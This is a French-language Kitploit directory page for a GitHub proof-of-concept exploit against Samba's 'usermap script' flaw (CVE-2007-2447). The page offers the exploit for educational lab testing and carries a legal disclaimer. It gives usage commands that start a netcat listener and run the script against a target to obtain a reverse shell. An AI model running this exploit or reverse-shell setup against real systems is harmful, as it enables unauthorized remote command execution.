Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2007-2447 — Exploit de preuve de concept pour l'exécution de commandes à distance via le script usermap de Samba (CVE-2007-2447) avec livraison de payload de reverse shell pour des tests en laboratoire éducatifs. | Kitploit
Outils/GitHubGitHub/abdulsaabir/cve-2007-2447
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationOutil d'Accès à Distance
GitHubabdulsaabir/cve-2007-2447

CVE-2007-2447

Exploit de preuve de concept pour l'exécution de commandes à distance via le script usermap de Samba (CVE-2007-2447) avec livraison de payload de reverse shell pour des tests en laboratoire éducatifs.

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2007-2447

PoC : Samba "usermap script" exécution de commandes à distance (CVE historique). Ce dépôt contient un petit script de preuve de concept pour la recherche et l'examen pédagogique. Le script principal est usermap_script_Command_Execution.py.

Référence : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

Utilisation

Clonez le dépôt et exécutez le script dans un laboratoire contrôlé. Le PoC utilise optionnellement un reverse shell vers LHOST:LPORT — démarrez votre écouteur avant d'exécuter le script et assurez-vous que les dépendances sont installées (voir Installation).

root@kitploit:~
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>

Paramètres

  • RHOST — IP ou nom d'hôte de la cible
  • RPORT — port TCP cible (généralement 139)
  • LHOST — IP de l'écouteur pour une connexion inverse
  • LPORT — port de l'écouteur

Installation

Recommandé : créez un environnement virtuel Python isolé et installez les dépendances à partir de requirements.txt avant d'exécuter le script.

root@kitploit:~
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt

Sécurité et Avertissement

Ce code est fourni uniquement pour la recherche légitime en sécurité, l'éducation et les tests défensifs. N'exécutez pas ce script contre un système que vous ne possédez pas ou pour lequel vous n'avez pas d'autorisation écrite explicite de tester. Une mauvaise utilisation peut entraîner des conséquences juridiques ; le propriétaire du dépôt n'est pas responsable d'une mauvaise utilisation.

Privilégiez toujours la revue de code statique et les tests en laboratoire contrôlé (instantanés de VM, réseaux isolés et captures de paquets) lors de l'analyse de code potentiellement dangereux.

Si vous souhaitez une présentation commentée non exécutable ou un fichier requirements.txt, ouvrez un problème ou faites une demande ici.

Télécharger l’outil